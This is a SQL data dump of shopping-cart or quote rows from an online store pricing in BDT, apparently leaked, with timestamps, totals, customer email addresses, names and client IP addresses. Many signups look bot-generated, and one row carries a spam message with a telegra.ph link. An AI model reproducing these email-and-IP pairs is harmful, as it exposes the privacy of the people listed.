(53, 1, '2022-01-14 01:49:29', '2022-01-14 01:49:29', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 28, NULL, 1, 'slee84134@gmail.com', NULL, 'nplyRGDhHfs', NULL, 'ZprNTivhKXSBgq', NULL, NULL, NULL, 1, 0, '189.109.239.46', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(54, 1, '2022-01-15 11:28:04', '2022-01-15 11:28:04', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.130.72.71', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(55, 1, '2022-01-22 07:27:27', '2022-01-22 07:27:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 29, NULL, 1, 'davenportmayo278905@gmail.com', NULL, 'JqZlpBhebD', NULL, 'wpgXNBSRboiK', NULL, NULL, NULL, 1, 0, '58.150.192.6', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(56, 1, '2022-01-23 09:16:38', '2022-01-23 09:16:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 30, NULL, 1, 'foleylane554743@gmail.com', NULL, 'qtHIMuFYWADxNjK', NULL, 'TYdamwoAjir', NULL, NULL, NULL, 1, 0, '101.43.104.203', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(57, 1, '2022-02-07 18:51:32', '2022-02-07 18:51:32', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 31, NULL, 1, 'premises.okonski7z@gmail.com', NULL, 'WVQaUwrRIAh', NULL, 'nAIgMkrDRsHJhuQ', NULL, NULL, NULL, 1, 0, '58.216.138.114', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(58, 1, '2022-02-23 21:09:12', '2022-02-23 21:09:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 32, NULL, 1, 'sherikahollimanfgv5@gmail.com', NULL, 'NCfbOgSH', NULL, 'vReIMSCzfbr', NULL, NULL, NULL, 1, 0, '109.219.98.207', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(59, 1, '2022-02-24 23:13:00', '2022-02-24 23:13:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 33, NULL, 1, 'baileyknight902@gmail.com', NULL, 'JEObpygFMeSTmVUr', NULL, 'KsObuCMFLlqNaPGi', NULL, NULL, NULL, 1, 0, '103.86.146.107', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(60, 1, '2022-03-02 13:47:57', '2022-03-02 13:47:59', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 513.6000, 513.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.204.208.63', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 642.0000, 642.0000, 513.6000, 513.6000, 1, 0, NULL, NULL, 0),
(61, 1, '2022-03-06 21:48:06', '2022-03-06 21:48:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 34, NULL, 1, 'paswinskiegstephaniesy@gmail.com', NULL, 'kLlWIdoPwuMxZg', NULL, 'mchtvaHfRTD', NULL, NULL, NULL, 1, 0, '110.77.161.206', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(62, 1, '2022-03-21 09:39:05', '2022-03-21 09:39:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 35, NULL, 1, 'ac316995@gmail.com', NULL, 'uhERVGtbveOyNsW', NULL, 'aWJMkLzv', NULL, NULL, NULL, 1, 0, '189.56.143.106', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(63, 1, '2022-03-27 13:21:48', '2022-03-27 13:21:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 36, NULL, 1, 'selinamdws@gmail.com', NULL, 'eKYPulgyOoJBUZ', NULL, 'DLBXOMwcmQZtxl', NULL, NULL, NULL, 1, 0, '110.34.10.243', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(64, 1, '2022-03-28 13:01:37', '2022-03-28 13:01:37', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 37, NULL, 1, 'wjwjbsvgdnsvd@gmail.com', NULL, 'DvCSFuwMYLOsiT', NULL, 'ZxnoySKOELGDhVX', NULL, NULL, NULL, 1, 0, '58.11.44.198', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(65, 1, '2022-04-02 08:01:07', '2022-04-02 08:01:07', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 38, NULL, 1, 'abdolahahmadi5289@gmail.com', NULL, 'knTUdPgqmufIZho', NULL, 'qIZpOGLMFCuRvsK', NULL, NULL, NULL, 1, 0, '14.162.135.39', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(66, 1, '2022-04-03 02:35:49', '2022-04-03 02:35:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 39, NULL, 1, 'gejyxjsxtacaraphillips@gmail.com', NULL, 'WLuypPmkKlYvQN', NULL, 'hMEWuoCAt', NULL, NULL, NULL, 1, 0, '183.232.32.178', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(67, 1, '2022-04-10 13:11:06', '2022-04-10 13:11:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 40, NULL, 1, 'hghyggyu@gmail.com', NULL, 'LQizynOK', NULL, 'zGDLAxlRrIipEka', NULL, NULL, NULL, 1, 0, '58.210.126.206', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(68, 1, '2022-04-16 06:33:30', '2022-04-16 06:33:30', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 41, NULL, 1, 'sedasertf710@gmail.com', NULL, 'AUGRypVTmKs', NULL, 'fxRSIFrlMGc', NULL, NULL, NULL, 1, 0, '177.106.146.254', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(69, 1, '2022-04-18 15:17:41', '2022-04-18 15:17:41', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 42, NULL, 1, 'mark.formel2356@gmail.com', NULL, 'KittyY loves a happy ending - her id725 www.telegra.ph/Tamar410-04-05', NULL, 'SHE FIND YOU NOW 232', NULL, NULL, NULL, 1, 0, '91.121.227.182', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(70, 1, '2022-04-23 00:03:57', '2022-04-23 00:03:57', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 43, NULL, 1, 'cinarmuge650@gmail.com', NULL, 'zXtGSxWNkrn', NULL, 'BXTMmZRaozOGuV', NULL, NULL, NULL, 1, 0, '14.169.176.239', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(71, 1, '2022-05-05 22:22:58', '2022-05-05 22:22:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 44, NULL, 1, 'Aannaedonnaey7797@gmail.com', NULL, 'GMSQvaVtJ', NULL, 'MvSYoZgl', NULL, NULL, NULL, 1, 0, '123.22.92.193', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(72, 1, '2022-05-06 18:26:19', '2022-05-06 18:26:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 45, NULL, 1, 'Aljudmilaodonnaab2943@gmail.com', NULL, 'mFNiQvJcKU', NULL, 'tHukXKsOUdF', NULL, NULL, NULL, 1, 0, '201.28.105.119', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(73, 1, '2022-05-13 10:04:05', '2022-05-13 10:04:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 46, NULL, 1, 'kiemcainhan66111@gmail.com', NULL, 'BOKQWXSAdkPuM', NULL, 'kedPilTFVU', NULL, NULL, NULL, 1, 0, '139.99.47.31', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(74, 1, '2022-05-14 01:52:47', '2022-05-14 01:52:47', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 47, NULL, 1, 'henrrycleoo102@gmail.com', NULL, 'TDnrNMJmEcgHZA', NULL, 'wEHjCZIb', NULL, NULL, NULL, 1, 0, '189.112.40.206', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(75, 1, '2022-06-04 23:05:45', '2022-06-04 23:05:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 48, NULL, 1, '54alexanderrose@gmail.com', NULL, 'JfsxzBLGrlVwMhH', NULL, 'WYCTLVuMd', NULL, NULL, NULL, 1, 0, '125.69.151.2', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(76, 1, '2022-06-22 14:50:39', '2022-06-22 14:50:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 49, NULL, 1, 'ujerimiahu57oa45@outlook.com', NULL, 'MpkNjnLcT', NULL, 'mgGhuTkqpDJ', NULL, NULL, NULL, 1, 0, '45.183.94.7', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(77, 1, '2022-06-28 00:43:01', '2022-06-28 00:43:01', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 50, NULL, 1, 'zangelikak30a89zehc@outlook.com', NULL, 'WLtFrejqDsbzEy', NULL, 'zVJBNvSabfhr', NULL, NULL, NULL, 1, 0, '86.129.30.15', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(78, 1, '2022-07-20 04:55:14', '2022-07-20 04:55:14', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 51, NULL, 1, 'markiceu260ak82ekq9y@outlook.com', NULL, 'dsmIbokgBP', NULL, 'tQoYIbRO', NULL, NULL, NULL, 1, 0, '115.73.213.31', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(79, 1, '2022-07-20 17:27:10', '2022-07-20 17:27:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 52, NULL, 1, 'vcolletteuo37w14z5iev0s@outlook.com', NULL, 'iDoPElKheB', NULL, 'WotyQvmpxXRcz', NULL, NULL, NULL, 1, 0, '187.108.194.152', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(80, 1, '2022-07-29 22:54:22', '2022-07-29 22:54:22', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 53, NULL, 1, 'gsheika728i8f6go4o@outlook.com', NULL, 'BqvTAjnSoQExmXFV', NULL, 'qEGjTYrZopSxIdJ', NULL, NULL, NULL, 1, 0, '45.189.194.55', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(81, 1, '2022-07-30 10:36:39', '2022-07-30 10:36:39', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.222.238.159', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(82, 1, '2022-07-30 13:14:46', '2022-07-30 13:14:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 54, NULL, 1, 'dkumiko461k0d5@outlook.com', NULL, 'wIqsyJGMgzZF', NULL, 'ZsvqxIjNOVirAtl', NULL, NULL, NULL, 1, 0, '147.75.117.50', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(83, 1, '2022-08-14 02:33:05', '2022-08-14 02:33:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 55, NULL, 1, 'dmoned651upqz@outlook.com', NULL, 'xQgzsmFp', NULL, 'NCHsBTOIp', NULL, NULL, NULL, 1, 0, '162.14.114.56', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(84, 1, '2022-08-28 04:30:38', '2022-08-28 04:30:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 56, NULL, 1, 'daveonb3l380b4j79@outlook.com', NULL, 'ruXGnUaPM', NULL, 'msiOarGVnU', NULL, NULL, NULL, 1, 0, '175.6.103.113', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(85, 1, '2022-08-31 15:48:54', '2022-08-31 15:48:54', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.150.40.29', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(86, 1, '2022-09-27 13:18:55', '2022-09-27 13:18:55', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '178.130.56.43', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(87, 1, '2022-10-07 22:13:50', '2022-10-07 22:13:50', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '45.88.102.164', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(88, 1, '2022-10-08 16:38:02', '2022-10-08 16:38:02', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '45.159.127.159', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(89, 1, '2022-10-24 18:48:15', '2022-10-24 18:48:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 57, NULL, 1, 'kegix91872@adroh.com', NULL, 'czxczc', NULL, 'zxczc', NULL, NULL, NULL, 1, 0, '185.238.168.55', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(90, 1, '2022-11-21 04:16:58', '2022-11-21 04:16:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 58, NULL, 1, 'Bok3yicexi@tempr.email', NULL, 'Boke', NULL, 'Ice', NULL, NULL, NULL, 1, 0, '193.32.249.133', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(91, 1, '2022-12-05 21:04:53', '2022-12-05 21:09:32', NULL, 1, 0, 0, 1, 65.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 2808.0000, 2808.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '212.102.57.209', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 3510.0000, 3510.0000, 2808.0000, 2808.0000, 1, 0, NULL, NULL, 0),
(92, 1, '2022-12-15 01:36:59', '2022-12-15 01:36:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 61, NULL, 1, 'klidrgyjqn@gmail.com', NULL, 'Ivan', NULL, 'Gamaz', NULL, NULL, NULL, 1, 0, '45.128.124.16', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(93, 1, '2022-12-29 16:21:10', '2022-12-29 16:21:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '104.43.199.151', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(94, 1, '2023-01-18 10:11:01', '2023-01-18 10:11:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 519.4000, 519.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '54.193.222.79', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(95, 1, '2023-03-05 17:54:19', '2023-03-05 17:54:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 59.0000, 59.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '80.76.51.225', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(96, 1, '2023-05-31 16:43:19', '2023-05-31 16:43:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 67, NULL, 1, 'wiliv29563@goflipa.com', NULL, 'Mia', NULL, 'Kim', NULL, NULL, NULL, 1, 0, '13.52.79.82', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(97, 1, '2023-06-18 23:46:27', '2023-06-18 23:46:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 68, NULL, 1, 'Galandean171@aveuva.com', NULL, 'Nicole', NULL, 'Rukstelo', NULL, NULL, NULL, 1, 0, '74.83.18.233', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(98, 1, '2023-06-27 18:56:11', '2023-06-27 18:56:11', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.192', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(99, 1, '2023-06-27 18:56:12', '2023-06-27 18:56:12', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.193', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(100, 1, '2023-06-27 19:07:43', '2023-06-27 19:07:43', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.203', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(101, 1, '2023-06-27 19:08:00', '2023-06-27 19:08:00', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.203', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(102, 1, '2023-06-27 19:23:17', '2023-06-27 19:23:17', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.192', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(103, 1, '2023-06-27 19:23:28', '2023-06-27 19:23:28', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.203', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(104, 1, '2023-06-27 19:45:20', '2023-06-27 19:45:20', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.192', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(105, 1, '2023-06-27 19:45:40', '2023-06-27 19:45:40', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.203', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(106, 1, '2023-06-27 20:00:54', '2023-06-27 20:00:54', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.203', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(107, 1, '2023-06-27 20:01:14', '2023-06-27 20:01:14', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.203', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(108, 1, '2023-06-27 20:17:28', '2023-06-27 20:17:28', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.75.203', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
